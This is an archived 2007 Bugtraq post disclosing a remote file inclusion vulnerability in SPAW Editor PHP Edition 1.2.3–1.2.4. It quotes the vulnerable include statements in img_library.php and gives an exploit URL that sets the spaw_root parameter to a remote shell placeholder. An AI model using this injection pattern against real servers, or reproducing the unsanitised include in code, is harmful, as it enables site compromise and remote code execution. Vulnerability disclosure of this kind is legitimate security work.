lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <20070302132254.09F75CA0D5@ws5-11.us4.outblaze.com> Date: Fri, 02 Mar 2007 21:22:53 +0800 From: "RaeD Hasadya" <raed@...mail.com> To: Bugtraq@...urityfocus.com Subject: SPAW Editor PHP Edition Remote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4 Discovered By : Hasadya Raed Contact Me : RaeD[at]BsdMail[dot]Com Download Script: http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip B.File :img_library.php : include $spaw_root.'class/util.class.php'; include $spaw_root.'class/lang.class.php'; =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK] By Hasadya Raed -- _______________________________________________ Get your free email from http://bsdmail.com